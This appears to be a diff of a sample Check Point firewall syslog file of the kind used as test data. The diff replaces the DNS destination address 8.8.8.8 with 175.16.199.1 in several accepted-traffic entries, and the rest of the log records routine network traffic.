 <134>1 2020-03-29T19:35:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f886,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.123"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53267"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T19:35:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f886,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42320"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T19:35:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f886,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42320"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T19:35:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f886,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"62339"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T19:35:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f886,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46626"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10313"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T19:35:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f889,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50982"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T19:35:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f88a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T19:35:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f890,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585510544"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46726"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T19:35:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f890,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585510544"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46726"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T19:35:48Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e80f896,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46034"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"]
 <134>1 2020-03-29T19:35:50Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f898,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"]
 <134>1 2020-03-29T19:36:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f8c5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51194"; service:"443"; service_id:"https"; src:"192.168.1.117"]
@@ -4433,16 +4433,16 @@
 <134>1 2020-03-29T19:37:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f8dc,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"33266"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10315"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T19:37:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f8dc,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57147"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T19:37:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f8dc,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"40968"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10316"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T19:37:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f8fb,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45655"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T19:37:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f8fb,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585510651"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32915"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T19:37:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f8fb,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45655"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T19:37:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f8fb,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585510651"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32915"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T19:37:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f8fd,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T19:37:41Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f905,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585510661"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58581"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T19:37:41Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f905,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585510661"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49213"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T19:37:41Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f905,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585510661"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58581"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T19:37:41Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f905,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585510661"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49213"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T19:37:50Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f90f,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"]
-<134>1 2020-03-29T19:37:51Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f90f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585510671"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46049"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T19:37:51Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f90f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585510671"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50500"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T19:38:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f919,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585510681"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52110"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T19:38:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f919,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585510681"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43120"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T19:37:51Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f90f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585510671"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46049"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
